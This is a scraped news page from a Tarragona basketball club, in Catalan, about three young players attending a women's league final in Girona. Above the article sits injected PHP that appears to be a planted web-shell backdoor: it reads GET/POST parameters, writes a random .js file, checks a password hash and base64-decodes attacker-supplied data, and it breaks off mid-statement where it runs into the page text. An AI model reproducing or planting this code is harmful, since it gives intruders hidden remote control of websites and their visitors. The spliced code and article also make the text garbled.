function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El TGN Bàsquet, un club que cuida els detalls - Tgn Bàsquet Club -

El TGN Bàsquet, un club que cuida els detalls

By
Updated: maig 7, 2015

“M’ho vaig passar molt bé, va ser impressionant estar en aquell pavelló amb tanta gent”. Carla Carmona té un somriure d’orella a orella mentre recorda el viatge que el TGN Bàsquet va organitzar fa un parell de setmanes a Girona. L’expedició lila va tenir com a finalitat veure el segon partit del play-off de Lliga Femenina, la màxima divisió estatal, i en què l’Uni Girona es va proclamar, per primera vegada en la seva història, campió en vèncer el Perfumerías Avenida -gran favorit- per 72-54. “Gràcies a aquest tipus de viatges nosaltres també vivim més el bàsquet. Tant de bo a Tarragona poguéssim tenir un equip tan bo com l’Uni Girona”, admet Paula Jaria. Ella, Carla i Mei González, van ser les tres jugadores alevins que es van decidir a anar a veure el matx. “Em va agradar molt, tota aquella gentada allí. M’encantaria que el club fes més excursions com aquestes”, assegura González.

Va ser una experiència inoblidable per les tres perquè, a banda de veure un pavelló de Fontajau ple fins la bandera i que el conjunt gironí guanyés el títol, Mei, Carla i Paula van poder baixar fins a peu de pista i fer-se fotografies amb les campiones i, fins i tot, tenir el trofeu a les mans [tal i com es pot veure a la foto]. “Les jugadores són molt més altes de com es veuen per la tele! Van ser molt simpàtiques perquè es van fer fotos amb nosaltres i ens van saludar tot picant de mans”, diu Carla. “Recordo com la número 43 [Gidden, de l’Uni] feia unes celebracions molt estranyes després de cada cistella [17 punts], va ser molt divertit”, recorda Mei tot rient.

A banda de la vessant més lúdica, les jugadores alevins del TGN Bàsquet asseguren que aquest tipus de sortides són un aprenentatge basquetbolístic. “Em vaig fixar com jugaven les pivots, perquè jo jugo en aquesta posició, i aprens perquè elles són molt bones”, afirma Carla Carmona.

El club vol continuar amb aquesta política de difusió i promoció del bàsquet d’elit femení i ja treballa en vista la pròxima temporada a fer sortides semblants perquè jugadores, jugadors i tècnics puguin tenir contacte amb els equips professionals.

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *